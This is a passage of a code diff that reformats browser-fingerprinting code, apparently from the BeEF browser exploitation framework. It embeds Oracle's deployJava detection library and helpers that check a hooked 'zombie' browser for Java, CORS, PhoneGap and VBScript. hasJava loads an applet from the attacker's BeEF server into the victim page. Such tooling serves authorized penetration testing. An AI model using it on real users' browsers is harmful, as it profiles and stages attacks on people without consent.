n=oClientCaps.getComponentVersion(o,"ComponentID");if((n=="")||(n=="5,0,5000,0")){return false}else{return true}}else{return false}},testUsingMimeTypes:function(o){if(!navigator.mimeTypes){g("[testUsingMimeTypes()] Browser claims to be Netscape family, but no mimeTypes[] array?");return false}for(var p=0;p<navigator.mimeTypes.length;++p){s=navigator.mimeTypes[p].type;var n=s.match(/^application\/x-java-applet\x3Bversion=(1\.8|1\.7|1\.6|1\.5|1\.4\.2)$/);if(n!=null){if(this.compareVersions(n[1],o)){return true}}}return false},testUsingPluginsArray:function(o){if((!navigator.plugins)||(!navigator.plugins.length)){return false}var n=navigator.platform.toLowerCase();for(var p=0;p<navigator.plugins.length;++p){s=navigator.plugins[p].description;if(s.search(/^Java Switchable Plug-in (Cocoa)/)!=-1){if(this.compareVersions("1.5.0",o)){return true}}else{if(s.search(/^Java/)!=-1){if(n.indexOf("win")!=-1){if(this.compareVersions("1.5.0",o)||this.compareVersions("1.6.0",o)){return true}}}}}if(this.compareVersions("1.5.0",o)){return true}return false},IEInstall:function(){location.href=this.getJavaURL+((this.returnPage!=null)?("&returnPage="+this.returnPage):"")+((this.locale!=null)?("&locale="+this.locale):"")+((this.brand!=null)?("&brand="+this.brand):"");return false},done:function(o,n){},FFInstall:function(){location.href=this.getJavaURL+((this.returnPage!=null)?("&returnPage="+this.returnPage):"")+((this.locale!=null)?("&locale="+this.locale):"")+((this.brand!=null)?("&brand="+this.brand):"")+((this.installType!=null)?("&type="+this.installType):"");return false},compareVersions:function(q,r){var o=q.split(".");var n=r.split(".");for(var p=0;p<o.length;++p){o[p]=Number(o[p])}for(var p=0;p<n.length;++p){n[p]=Number(n[p])}if(o.length==2){o[2]=0}if(o[0]>n[0]){return true}if(o[0]<n[0]){return false}if(o[1]>n[1]){return true}if(o[1]<n[1]){return false}if(o[2]>n[2]){return true}if(o[2]<n[2]){return false}return true},enableAlerts:function(){this.browserName=null;this.debug=true},poll:function(){this.refresh();var n=this.getJREs();if((this.preInstallJREList.length==0)&&(n.length!=0)){clearInterval(this.myInterval);if(this.returnPage!=null){location.href=this.returnPage}}if((this.preInstallJREList.length!=0)&&(n.length!=0)&&(this.preInstallJREList[0]!=n[0])){clearInterval(this.myInterval);if(this.returnPage!=null){location.href=this.returnPage}}},writePluginTag:function(){var n=this.getBrowser();if(n=="MSIE"){document.write('<object classid="clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA" id="deployJavaPlugin" width="0" height="0"></object>')}else{if(n=="Netscape Family"&&this.allowPlugin()){this.writeEmbedTag()}}},refresh:function(){navigator.plugins.refresh(false);var n=this.getBrowser();if(n=="Netscape Family"&&this.allowPlugin()){var o=document.getElementById("deployJavaPlugin");if(o==null){this.writeEmbedTag()}}},writeEmbedTag:function(){var n=false;if(navigator.mimeTypes!=null){for(var o=0;o<navigator.mimeTypes.length;o++){if(navigator.mimeTypes[o].type==this.mimeType){if(navigator.mimeTypes[o].enabledPlugin){document.write('<embed id="deployJavaPlugin" type="'+this.mimeType+'" hidden="true" />');n=true}}}if(!n){for(var o=0;o<navigator.mimeTypes.length;o++){if(navigator.mimeTypes[o].type==this.oldMimeType){if(navigator.mimeTypes[o].enabledPlugin){document.write('<embed id="deployJavaPlugin" type="'+this.oldMimeType+'" hidden="true" />')}}}}}}};d.writePluginTag();if(d.locale==null){var h=null;if(h==null){try{h=navigator.userLanguage}catch(f){}}if(h==null){try{h=navigator.systemLanguage}catch(f){}}if(h==null){try{h=navigator.language}catch(f){}}if(h!=null){h.replace("-","_");d.locale=h}}return d}();
+            deployJava = function () {
+                var l = {core:["id", "class", "title", "style"], i18n:["lang", "dir"], events:["onclick", "ondblclick", "onmousedown", "onmouseup", "onmouseover", "onmousemove", "onmouseout", "onkeypress", "onkeydown", "onkeyup"], applet:["codebase", "code", "name", "archive", "object", "width", "height", "alt", "align", "hspace", "vspace"], object:["classid", "codebase", "codetype", "data", "type", "archive", "declare", "standby", "height", "width", "usemap", "name", "tabindex", "align", "border", "hspace", "vspace"]};
+                var b = l.object.concat(l.core, l.i18n, l.events);
+                var m = l.applet.concat(l.core);
+
+                function g(n) {
+                    if (!d.debug) {
+                        return
+                    }
+                    if (console.log) {
+                        console.log(n)
+                    } else {
+                        alert(n)
+                    }
+                }
+
+                function k(o, n) {
+                    if (o == null || o.length == 0) {
+                        return true
+                    }
+                    var q = o.charAt(o.length - 1);
+                    if (q != "+" && q != "*" && (o.indexOf("_") != -1 && q != "_")) {
+                        o = o + "*";
+                        q = "*"
+                    }
+                    o = o.substring(0, o.length - 1);
+                    if (o.length > 0) {
+                        var p = o.charAt(o.length - 1);
+                        if (p == "." || p == "_") {
+                            o = o.substring(0, o.length - 1)
+                        }
+                    }
+                    if (q == "*") {
+                        return(n.indexOf(o) == 0)
+                    } else {
+                        if (q == "+") {
+                            return o <= n
+                        }
+                    }
+                    return false
+                }
+
+                function e() {
+                    var n = "//java.com/js/webstart.png";
+                    try {
+                        return document.location.protocol.indexOf("http") != -1 ? n : "http:" + n
+                    } catch (o) {
+                        return"http:" + n
+                    }
+                }
+
+                function j(p, o) {
+                    var n = p.length;
+                    for (var q = 0; q < n; q++) {
+                        if (p[q] === o) {
+                            return true
+                        }
+                    }
+                    return false
+                }
+
+                function c(n) {
+                    return j(m, n.toLowerCase())
+                }
+
+                function i(n) {
+                    return j(b, n.toLowerCase())
+                }
+
+                function a(n) {
+                    if ("MSIE" != deployJava.browserName) {
+                        return true
+                    }
+                    if (deployJava.compareVersionToPattern(deployJava.getPlugin().version, ["10", "0", "0"], false, true)) {
+                        return true
+                    }
+                    if (n == null) {
+                        return false
+                    }
+                    return !k("1.6.0_33+", n)
+                }
+
+                var d = {debug:null, version:"20120801", firefoxJavaVersion:null, myInterval:null, preInstallJREList:null, returnPage:null, brand:null, locale:null, installType:null, EAInstallEnabled:false, EarlyAccessURL:null, getJavaURL:"http://jdl.sun.com/webapps/getjava/BrowserRedirect?host=java.com", oldMimeType:"application/npruntime-scriptable-plugin;DeploymentToolkit", mimeType:"application/java-deployment-toolkit", launchButtonPNG:e(), browserName:null, browserName2:null, getJREs:function () {
+                    var r = new Array();
+                    if (this.isPluginInstalled()) {
+                        var q = this.getPlugin();
+                        var n = q.jvms;
+                        for (var p = 0; p < n.getLength(); p++) {
+                            r[p] = n.get(p).version
+                        }
+                    } else {
+                        var o = this.getBrowser();
+                        if (o == "MSIE") {
+                            if (this.testUsingActiveX("1.7.0")) {
+                                r[0] = "1.7.0"
+                            } else {
+                                if (this.testUsingActiveX("1.6.0")) {
+                                    r[0] = "1.6.0"
+                                } else {
+                                    if (this.testUsingActiveX("1.5.0")) {
+                                        r[0] = "1.5.0"
+                                    } else {
+                                        if (this.testUsingActiveX("1.4.2")) {
+                                            r[0] = "1.4.2"
+                                        } else {
+                                            if (this.testForMSVM()) {
+                                                r[0] = "1.1"
+                                            }
+                                        }
+                                    }
+                                }
+                            }
+                        } else {
+                            if (o == "Netscape Family") {
+                                this.getJPIVersionUsingMimeType();
+                                if (this.firefoxJavaVersion != null) {
+                                    r[0] = this.firefoxJavaVersion
+                                } else {
+                                    if (this.testUsingMimeTypes("1.7")) {
+                                        r[0] = "1.7.0"
+                                    } else {
+                                        if (this.testUsingMimeTypes("1.6")) {
+                                            r[0] = "1.6.0"
+                                        } else {
+                                            if (this.testUsingMimeTypes("1.5")) {
+                                                r[0] = "1.5.0"
+                                            } else {
+                                                if (this.testUsingMimeTypes("1.4.2")) {
+                                                    r[0] = "1.4.2"
+                                                } else {
+                                                    if (this.browserName2 == "Safari") {
+                                                        if (this.testUsingPluginsArray("1.7.0")) {
+                                                            r[0] = "1.7.0"
+                                                        } else {
+                                                            if (this.testUsingPluginsArray("1.6")) {
+                                                                r[0] = "1.6.0"
+                                                            } else {
+                                                                if (this.testUsingPluginsArray("1.5")) {
+                                                                    r[0] = "1.5.0"
+                                                                } else {
+                                                                    if (this.testUsingPluginsArray("1.4.2")) {
+                                                                        r[0] = "1.4.2"
+                                                                    }
+                                                                }
+                                                            }
+                                                        }
+                                                    }
+                                                }
+                                            }
+                                        }
+                                    }
+                                }
+                            }
+                        }
+                    }
+                    if (this.debug) {
+                        for (var p = 0; p < r.length; ++p) {
+                            g("[getJREs()] We claim to have detected Java SE " + r[p])
+                        }
+                    }
+                    return r
+                }, installJRE:function (q, o) {
+                    var n = false;
+                    if (this.isPluginInstalled() && this.isAutoInstallEnabled(q)) {
+                        var p = false;
+                        if (this.isCallbackSupported()) {
+                            p = this.getPlugin().installJRE(q, o)
+                        } else {
+                            p = this.getPlugin().installJRE(q)
+                        }
+                        if (p) {
+                            this.refresh();
+                            if (this.returnPage != null) {
+                                document.location = this.returnPage
+                            }
+                        }
+                        return p
+                    } else {
+                        return this.installLatestJRE()
+                    }
+                }, isAutoInstallEnabled:function (n) {
+                    if (!this.isPluginInstalled()) {
+                        return false
+                    }
+                    if (typeof n == "undefined") {
+                        n = null
+                    }
+                    return a(n)
+                }, isCallbackSupported:function () {
+                    return this.isPluginInstalled() && this.compareVersionToPattern(this.getPlugin().version, ["10", "2", "0"], false, true)
+                }, installLatestJRE:function (p) {
+                    if (this.isPluginInstalled() && this.isAutoInstallEnabled()) {
+                        var q = false;
+                        if (this.isCallbackSupported()) {
+                            q = this.getPlugin().installLatestJRE(p)
+                        } else {
+                            q = this.getPlugin().installLatestJRE()
+                        }
+                        if (q) {
+                            this.refresh();
+                            if (this.returnPage != null) {
+                                document.location = this.returnPage
+                            }
+                        }
+                        return q
+                    } else {
+                        var o = this.getBrowser();
+                        var n = navigator.platform.toLowerCase();
+                        if ((this.EAInstallEnabled == "true") && (n.indexOf("win") != -1) && (this.EarlyAccessURL != null)) {
+                            this.preInstallJREList = this.getJREs();
+                            if (this.returnPage != null) {
+                                this.myInterval = setInterval("deployJava.poll()", 3000)
+                            }
+                            location.href = this.EarlyAccessURL;
+                            return false
+                        } else {
+                            if (o == "MSIE") {
+                                return this.IEInstall()
+                            } else {
+                                if ((o == "Netscape Family") && (n.indexOf("win32") != -1)) {
+                                    return this.FFInstall()
+                                } else {
+                                    location.href = this.getJavaURL + ((this.returnPage != null) ? ("&returnPage=" + this.returnPage) : "") + ((this.locale != null) ? ("&locale=" + this.locale) : "") + ((this.brand != null) ? ("&brand=" + this.brand) : "")
+                                }
+                            }
+                            return false
+                        }
+                    }
+                }, runApplet:function (o, t, q) {
+                    if (q == "undefined" || q == null) {
+                        q = "1.1"
+                    }
+                    var r = "^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?$";
+                    var n = q.match(r);
+                    if (this.returnPage == null) {
+                        this.returnPage = document.location
+                    }
+                    if (n != null) {
+                        var p = this.getBrowser();
+                        if (p != "?") {
+                            if (this.versionCheck(q + "+")) {
+                                this.writeAppletTag(o, t)
+                            } else {
+                                if (this.installJRE(q + "+")) {
+                                    this.refresh();
+                                    location.href = document.location;
+                                    this.writeAppletTag(o, t)
+                                }
+                            }
+                        } else {
+                            this.writeAppletTag(o, t)
+                        }
+                    } else {
+                        g("[runApplet()] Invalid minimumVersion argument to runApplet():" + q)
+                    }
+                }, writeAppletTag:function (q, v) {
+                    var n = "<applet ";
+                    var p = "";
+                    var r = "</applet>";
+                    var w = true;
+                    if (null == v || typeof v != "object") {
+                        v = new Object()
+                    }
+                    for (var o in q) {
+                        if (!c(o)) {
+                            v[o] = q[o]
+                        } else {
+                            n += (" " + o + '="' + q[o] + '"');
+                            if (o == "code") {
+                                w = false
+                            }
+                        }
+                    }
+                    var u = false;
+                    for (var t in v) {
+                        if (t == "codebase_lookup") {
+                            u = true
+                        }
+                        if (t == "object" || t == "java_object" || t == "java_code") {
+                            w = false
+                        }
+                        p += '<param name="' + t + '" value="' + v[t] + '"/>'
+                    }
+                    if (!u) {
+                        p += '<param name="codebase_lookup" value="false"/>'
+                    }
+                    if (w) {
+                        n += (' code="dummy"')
+                    }
+                    n += ">";
+                    document.write(n + "\n" + p + "\n" + r)
+                }, versionCheck:function (o) {
+                    var u = 0;
+                    var w = "^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?(\\*|\\+)?$";
+                    var x = o.match(w);
+                    if (x != null) {
+                        var q = false;
+                        var t = false;
+                        var p = new Array();
+                        for (var r = 1; r < x.length; ++r) {
+                            if ((typeof x[r] == "string") && (x[r] != "")) {
+                                p[u] = x[r];
+                                u++
+                            }
+                        }
+                        if (p[p.length - 1] == "+") {
+                            t = true;
+                            q = false;
+                            p.length--
+                        } else {
+                            if (p[p.length - 1] == "*") {
+                                t = false;
+                                q = true;
+                                p.length--
+                            } else {
+                                if (p.length < 4) {
+                                    t = false;
+                                    q = true
+                                }
+                            }
+                        }
+                        var v = this.getJREs();
+                        for (var r = 0; r < v.length; ++r) {
+                            if (this.compareVersionToPattern(v[r], p, q, t)) {
+                                return true
+                            }
+                        }
+                        return false
+                    } else {
+                        var n = "Invalid versionPattern passed to versionCheck: " + o;
+                        g("[versionCheck()] " + n);
+                        alert(n);
+                        return false
+                    }
+                }, isWebStartInstalled:function (q) {
+                    var p = this.getBrowser();
+                    if (p == "?") {
+                        return true
+                    }
+                    if (q == "undefined" || q == null) {
+                        q = "1.4.2"
+                    }
+                    var o = false;
+                    var r = "^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?$";
+                    var n = q.match(r);
+                    if (n != null) {
+                        o = this.versionCheck(q + "+")
+                    } else {
+                        g("[isWebStartInstaller()] Invalid minimumVersion argument to isWebStartInstalled(): " + q);
+                        o = this.versionCheck("1.4.2+")
+                    }
+                    return o
+                }, getJPIVersionUsingMimeType:function () {
+                    for (var o = 0; o < navigator.mimeTypes.length; ++o) {
+                        var p = navigator.mimeTypes[o].type;
+                        var n = p.match(/^application\/x-java-applet;jpi-version=(.*)$/);
+                        if (n != null) {
+                            this.firefoxJavaVersion = n[1];
+                            if ("Opera" != this.browserName2) {
+                                break
+                            }
+                        }
+                    }
+                }, launchWebStartApplication:function (q) {
+                    var n = navigator.userAgent.toLowerCase();
+                    this.getJPIVersionUsingMimeType();
+                    if (this.isWebStartInstalled("1.7.0") == false) {
+                        if ((this.installJRE("1.7.0+") == false) || ((this.isWebStartInstalled("1.7.0") == false))) {
+                            return false
+                        }
+                    }
+                    var t = null;
+                    if (document.documentURI) {
+                        t = document.documentURI
+                    }
+                    if (t == null) {
+                        t = document.URL
+                    }
+                    var o = this.getBrowser();
+                    var p;
+                    if (o == "MSIE") {
+                        p = '<object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="0" height="0"><PARAM name="launchjnlp" value="' + q + '"><PARAM name="docbase" value="' + t + '"></object>'
+                    } else {
+                        if (o == "Netscape Family") {
+                            p = '<embed type="application/x-java-applet;jpi-version=' + this.firefoxJavaVersion + '" width="0" height="0" launchjnlp="' + q + '"docbase="' + t + '" />'
+                        }
+                    }
+                    if (document.body == "undefined" || document.body == null) {
+                        document.write(p);
+                        document.location = t
+                    } else {
+                        var r = document.createElement("div");
+                        r.id = "div1";
+                        r.style.position = "relative";
+                        r.style.left = "-10000px";
+                        r.style.margin = "0px auto";
+                        r.className = "dynamicDiv";
+                        r.innerHTML = p;
+                        document.body.appendChild(r)
+                    }
+                }, createWebStartLaunchButtonEx:function (p, o) {
+                    if (this.returnPage == null) {
+                        this.returnPage = p
+                    }
+                    var n = "javascript:deployJava.launchWebStartApplication('" + p + "');";
+                    document.write('<a href="' + n + '" onMouseOver="window.status=\'\'; return true;"><img src="' + this.launchButtonPNG + '" border="0" /></a>')
+                }, createWebStartLaunchButton:function (p, o) {
+                    if (this.returnPage == null) {
+                        this.returnPage = p
+                    }
+                    var n = "javascript:if (!deployJava.isWebStartInstalled(&quot;" + o + "&quot;)) {if (deployJava.installLatestJRE()) {if (deployJava.launch(&quot;" + p + "&quot;)) {}}} else {if (deployJava.launch(&quot;" + p + "&quot;)) {}}";
+                    document.write('<a href="' + n + '" onMouseOver="window.status=\'\'; return true;"><img src="' + this.launchButtonPNG + '" border="0" /></a>')
+                }, launch:function (n) {
+                    document.location = n;
+                    return true
+                }, isPluginInstalled:function () {
+                    var n = this.getPlugin();
+                    if (n && n.jvms) {
+                        return true
+                    } else {
+                        return false
+                    }
+                }, isAutoUpdateEnabled:function () {
+                    if (this.isPluginInstalled()) {
+                        return this.getPlugin().isAutoUpdateEnabled()
+                    }
+                    return false
+                }, setAutoUpdateEnabled:function () {
+                    if (this.isPluginInstalled()) {
+                        return this.getPlugin().setAutoUpdateEnabled()
+                    }
+                    return false
+                }, setInstallerType:function (n) {
+                    this.installType = n;
+                    if (this.isPluginInstalled()) {
+                        return this.getPlugin().setInstallerType(n)
+                    }
+                    return false
+                }, setAdditionalPackages:function (n) {
+                    if (this.isPluginInstalled()) {
+                        return this.getPlugin().setAdditionalPackages(n)
+                    }
+                    return false
+                }, setEarlyAccess:function (n) {
+                    this.EAInstallEnabled = n
+                }, isPlugin2:function () {
+                    if (this.isPluginInstalled()) {
+                        if (this.versionCheck("1.6.0_10+")) {
+                            try {
+                                return this.getPlugin().isPlugin2()
+                            } catch (n) {
+                            }
+                        }
+                    }
+                    return false
+                }, allowPlugin:function () {
+                    this.getBrowser();
+                    var n = ("Safari" != this.browserName2 && "Opera" != this.browserName2);
+                    return n
+                }, getPlugin:function () {
+                    this.refresh();
+                    var n = null;
+                    if (this.allowPlugin()) {
+                        n = document.getElementById("deployJavaPlugin")
+                    }
+                    return n
+                }, compareVersionToPattern:function (u, o, q, r) {
+                    if (u == undefined || o == undefined) {
+                        return false
+                    }
+                    var v = "^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?$";
+                    var w = u.match(v);
+                    if (w != null) {
+                        var t = 0;
+                        var x = new Array();
+                        for (var p = 1; p < w.length; ++p) {
+                            if ((typeof w[p] == "string") && (w[p] != "")) {
+                                x[t] = w[p];
+                                t++
+                            }
+                        }
+                        var n = Math.min(x.length, o.length);
+                        if (r) {
+                            for (var p = 0; p < n; ++p) {
+                                if (x[p] < o[p]) {
+                                    return false
+                                } else {
+                                    if (x[p] > o[p]) {
+                                        return true
+                                    }
+                                }
+                            }
+                            return true
+                        } else {
+                            for (var p = 0; p < n; ++p) {
+                                if (x[p] != o[p]) {
+                                    return false
+                                }
+                            }
+                            if (q) {
+                                return true
+                            } else {
+                                return(x.length == o.length)
+                            }
+                        }
+                    } else {
+                        return false
+                    }
+                }, getBrowser:function () {
+                    if (this.browserName == null) {
+                        var n = navigator.userAgent.toLowerCase();
+                        g("[getBrowser()] navigator.userAgent.toLowerCase() -> " + n);
+                        if ((n.indexOf("msie") != -1) && (n.indexOf("opera") == -1)) {
+                            this.browserName = "MSIE";
+                            this.browserName2 = "MSIE"
+                        } else {
+                            if (n.indexOf("iphone") != -1) {
+                                this.browserName = "Netscape Family";
+                                this.browserName2 = "iPhone"
+                            } else {
+                                if ((n.indexOf("firefox") != -1) && (n.indexOf("opera") == -1)) {
+                                    this.browserName = "Netscape Family";
+                                    this.browserName2 = "Firefox"
+                                } else {
+                                    if (n.indexOf("chrome") != -1) {
+                                        this.browserName = "Netscape Family";
+                                        this.browserName2 = "Chrome"
+                                    } else {
+                                        if (n.indexOf("safari") != -1) {
+                                            this.browserName = "Netscape Family";
+                                            this.browserName2 = "Safari"
+                                        } else {
+                                            if ((n.indexOf("mozilla") != -1) && (n.indexOf("opera") == -1)) {
+                                                this.browserName = "Netscape Family";
+                                                this.browserName2 = "Other"
+                                            } else {
+                                                if (n.indexOf("opera") != -1) {
+                                                    this.browserName = "Netscape Family";
+                                                    this.browserName2 = "Opera"
+                                                } else {
+                                                    this.browserName = "?";
+                                                    this.browserName2 = "unknown"
+                                                }
+                                            }
+                                        }
+                                    }
+                                }
+                            }
+                        }
+                        g("[getBrowser()] Detected browser name:" + this.browserName + ", " + this.browserName2)
+                    }
+                    return this.browserName
+                }, testUsingActiveX:function (n) {
+                    var p = "JavaWebStart.isInstalled." + n + ".0";
+                    if (typeof ActiveXObject == "undefined" || !ActiveXObject) {
+                        g("[testUsingActiveX()] Browser claims to be IE, but no ActiveXObject object?");
+                        return false
+                    }
+                    try {
+                        return(new ActiveXObject(p) != null)
+                    } catch (o) {
+                        return false
+                    }
+                }, testForMSVM:function () {
+                    var o = "{08B0E5C0-4FCB-11CF-AAA5-00401C608500}";
+                    if (typeof oClientCaps != "undefined") {
+                        var n = oClientCaps.getComponentVersion(o, "ComponentID");
+                        if ((n == "") || (n == "5,0,5000,0")) {
+                            return false
+                        } else {
+                            return true
+                        }
+                    } else {
+                        return false
+                    }
+                }, testUsingMimeTypes:function (o) {
+                    if (!navigator.mimeTypes) {
+                        g("[testUsingMimeTypes()] Browser claims to be Netscape family, but no mimeTypes[] array?");
+                        return false
+                    }
+                    for (var p = 0; p < navigator.mimeTypes.length; ++p) {
+                        s = navigator.mimeTypes[p].type;
+                        var n = s.match(/^application\/x-java-applet\x3Bversion=(1\.8|1\.7|1\.6|1\.5|1\.4\.2)$/);
+                        if (n != null) {
+                            if (this.compareVersions(n[1], o)) {
+                                return true
+                            }
+                        }
+                    }
+                    return false
+                }, testUsingPluginsArray:function (o) {
+                    if ((!navigator.plugins) || (!navigator.plugins.length)) {
+                        return false
+                    }
+                    var n = navigator.platform.toLowerCase();
+                    for (var p = 0; p < navigator.plugins.length; ++p) {
+                        s = navigator.plugins[p].description;
+                        if (s.search(/^Java Switchable Plug-in (Cocoa)/) != -1) {
+                            if (this.compareVersions("1.5.0", o)) {
+                                return true
+                            }
+                        } else {
+                            if (s.search(/^Java/) != -1) {
+                                if (n.indexOf("win") != -1) {
+                                    if (this.compareVersions("1.5.0", o) || this.compareVersions("1.6.0", o)) {
+                                        return true
+                                    }
+                                }
+                            }
+                        }
+                    }
+                    if (this.compareVersions("1.5.0", o)) {
+                        return true
+                    }
+                    return false
+                }, IEInstall:function () {
+                    location.href = this.getJavaURL + ((this.returnPage != null) ? ("&returnPage=" + this.returnPage) : "") + ((this.locale != null) ? ("&locale=" + this.locale) : "") + ((this.brand != null) ? ("&brand=" + this.brand) : "");
+                    return false
+                }, done:function (o, n) {
+                }, FFInstall:function () {
+                    location.href = this.getJavaURL + ((this.returnPage != null) ? ("&returnPage=" + this.returnPage) : "") + ((this.locale != null) ? ("&locale=" + this.locale) : "") + ((this.brand != null) ? ("&brand=" + this.brand) : "") + ((this.installType != null) ? ("&type=" + this.installType) : "");
+                    return false
+                }, compareVersions:function (q, r) {
+                    var o = q.split(".");
+                    var n = r.split(".");
+                    for (var p = 0; p < o.length; ++p) {
+                        o[p] = Number(o[p])
+                    }
+                    for (var p = 0; p < n.length; ++p) {
+                        n[p] = Number(n[p])
+                    }
+                    if (o.length == 2) {
+                        o[2] = 0
+                    }
+                    if (o[0] > n[0]) {
+                        return true
+                    }
+                    if (o[0] < n[0]) {
+                        return false
+                    }
+                    if (o[1] > n[1]) {
+                        return true
+                    }
+                    if (o[1] < n[1]) {
+                        return false
+                    }
+                    if (o[2] > n[2]) {
+                        return true
+                    }
+                    if (o[2] < n[2]) {
+                        return false
+                    }
+                    return true
+                }, enableAlerts:function () {
+                    this.browserName = null;
+                    this.debug = true
+                }, poll:function () {
+                    this.refresh();
+                    var n = this.getJREs();
+                    if ((this.preInstallJREList.length == 0) && (n.length != 0)) {
+                        clearInterval(this.myInterval);
+                        if (this.returnPage != null) {
+                            location.href = this.returnPage
+                        }
+                    }
+                    if ((this.preInstallJREList.length != 0) && (n.length != 0) && (this.preInstallJREList[0] != n[0])) {
+                        clearInterval(this.myInterval);
+                        if (this.returnPage != null) {
+                            location.href = this.returnPage
+                        }
+                    }
+                }, writePluginTag:function () {
+                    var n = this.getBrowser();
+                    if (n == "MSIE") {
+                        document.write('<object classid="clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA" id="deployJavaPlugin" width="0" height="0"></object>')
+                    } else {
+                        if (n == "Netscape Family" && this.allowPlugin()) {
+                            this.writeEmbedTag()
+                        }
+                    }
+                }, refresh:function () {
+                    navigator.plugins.refresh(false);
+                    var n = this.getBrowser();
+                    if (n == "Netscape Family" && this.allowPlugin()) {
+                        var o = document.getElementById("deployJavaPlugin");
+                        if (o == null) {
+                            this.writeEmbedTag()
+                        }
+                    }
+                }, writeEmbedTag:function () {
+                    var n = false;
+                    if (navigator.mimeTypes != null) {
+                        for (var o = 0; o < navigator.mimeTypes.length; o++) {
+                            if (navigator.mimeTypes[o].type == this.mimeType) {
+                                if (navigator.mimeTypes[o].enabledPlugin) {
+                                    document.write('<embed id="deployJavaPlugin" type="' + this.mimeType + '" hidden="true" />');
+                                    n = true
+                                }
+                            }
+                        }
+                        if (!n) {
+                            for (var o = 0; o < navigator.mimeTypes.length; o++) {
+                                if (navigator.mimeTypes[o].type == this.oldMimeType) {
+                                    if (navigator.mimeTypes[o].enabledPlugin) {
+                                        document.write('<embed id="deployJavaPlugin" type="' + this.oldMimeType + '" hidden="true" />')
+                                    }
+                                }
+                            }
+                        }
+                    }
+                }};
+                d.writePluginTag();
+                if (d.locale == null) {
+                    var h = null;
+                    if (h == null) {
+                        try {
+                            h = navigator.userLanguage
+                        } catch (f) {
+                        }
+                    }
+                    if (h == null) {
+                        try {
+                            h = navigator.systemLanguage
+                        } catch (f) {
+                        }
+                    }
+                    if (h == null) {
+                        try {
+                            h = navigator.language
+                        } catch (f) {
+                        }
+                    }
+                    if (h != null) {
+                        h.replace("-", "_");
+                        d.locale = h
+                    }
+                }
+                return d
+            }();
 
             var versionJRE = deployJava.getJREs();
 
-            if(versionJRE != '')
-            {
+            if (versionJRE != '') {
                 return true;
-            }else {
+            } else {
                 return false;
             }
         }
-        else
-        {
+        else {
             function testUsingActiveX(n) {
                 var p = "JavaWebStart.isInstalled." + n + ".0";
                 if (typeof ActiveXObject == "undefined" || !ActiveXObject) {
@@ -770,185 +1684,317 @@ return !!window.devicePixelRatio && !!window.history.replaceState && window.navi
 
         }
 
-	},
+    },
 
-	/**
-	 * Checks if the Phonegap API is available from the hooked domain.
-	 * @return: {Boolean} true or false.
-	 *
-	 * @example: if(beef.browser.hasPhonegap()) { ... }
-	 */
-	hasPhonegap: function() {
-		var result = false;
-		try { if (!!device.phonegap) result = true; else result = false; }
-		catch(e) { result = false; }
-		return result;
-	},
+    /**
+     * Checks if the Phonegap API is available from the hooked domain.
+     * @return: {Boolean} true or false.
+     *
+     * @example: if(beef.browser.hasPhonegap()) { ... }
+     */
+    hasPhonegap:function () {
+        var result = false;
+        try {
+            if (!!device.phonegap) result = true; else result = false;
+        }
+        catch (e) {
+            result = false;
+        }
+        return result;
+    },
 
-	/**
-	 * Checks if the browser supports CORS
-	 * @return: {Boolean} true or false.
-	 *
-	 * @example: if(beef.browser.hasCors()) { ... }
-	 */
-	hasCors: function() {
-		if ('withCredentials' in new XMLHttpRequest())
-			return true;
-		else if (typeof XDomainRequest !== "undefined")
-			return true;
-		else
-			return false;
-	},
+    /**
+     * Checks if the browser supports CORS
+     * @return: {Boolean} true or false.
+     *
+     * @example: if(beef.browser.hasCors()) { ... }
+     */
+    hasCors:function () {
+        if ('withCredentials' in new XMLHttpRequest())
+            return true;
+        else if (typeof XDomainRequest !== "undefined")
+            return true;
+        else
+            return false;
+    },
 
-	/**
-	 * Checks if the zombie has Java installed and enabled.
-	 * @return: {Boolean} true or false.
-	 *
-	 * @example: if(beef.browser.hasJava()) { ... }
-	 */
-	hasJava: function() {
+    /**
+     * Checks if the zombie has Java installed and enabled.
+     * @return: {Boolean} true or false.
+     *
+     * @example: if(beef.browser.hasJava()) { ... }
+     */
+    hasJava:function () {
 
-		// Check if Java is enabled
-		if (!beef.browser.javaEnabled()) {
-			return false;
-		}
+        // Check if Java is enabled
+        if (!beef.browser.javaEnabled()) {
+            return false;
+        }
 
-		// This is a temporary fix as this does not work on Safari and Chrome
-		// Chrome requires manual user intervention even with unsigned applets.
-		// Safari requires a few seconds to load the applet.
-		if (beef.browser.isC() || beef.browser.isS()) {
-			return true;
-		}
+        // This is a temporary fix as this does not work on Safari and Chrome
+        // Chrome requires manual user intervention even with unsigned applets.
+        // Safari requires a few seconds to load the applet.
+        if (beef.browser.isC() || beef.browser.isS()) {
+            return true;
+        }
 
-		// Inject an unsigned java applet to double check if the Java
-		// plugin is working fine.
-		try {
-			var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/demos/checkJava.jar';
-   				var applet_id = 'checkJava';
-   				var applet_name = 'checkJava';
-   				var output;
-   				beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'checkJava' ,
-  				null, applet_archive, null);
-   				output = document.Microsoft_Corporation.getInfo();
-			beef.dom.detachApplet('checkJava');
-			return output = 1;
-		} catch(e) {
-			return false;
-		}
-	},
+        // Inject an unsigned java applet to double check if the Java
+        // plugin is working fine.
+        try {
+            var applet_archive = 'http://' + beef.net.host + ':' + beef.net.port + '/demos/checkJava.jar';
+            var applet_id = 'checkJava';
+            var applet_name = 'checkJava';
+            var output;
+            beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'checkJava',
+                null, applet_archive, null);
+            output = document.Microsoft_Corporation.getInfo();
+            beef.dom.detachApplet('checkJava');
+            return output = 1;
+        } catch (e) {
+            return false;
+        }
+    },
 
-	/**
-	 * Checks if the zombie has VBScript enabled.
-	 * @return: {Boolean} true or false.
-	 *
-	 * @example: if(beef.browser.hasVBScript()) { ... }
-	 */
-	hasVBScript: function() {
-		if ((navigator.userAgent.indexOf('MSIE') != -1) && (navigator.userAgent.indexOf('Win') != -1)) {
-			return true;
-		} else {
-			return false;
-		}
-	},
+    /**
+     * Checks if the zombie has VBScript enabled.
+     * @return: {Boolean} true or false.
+     *
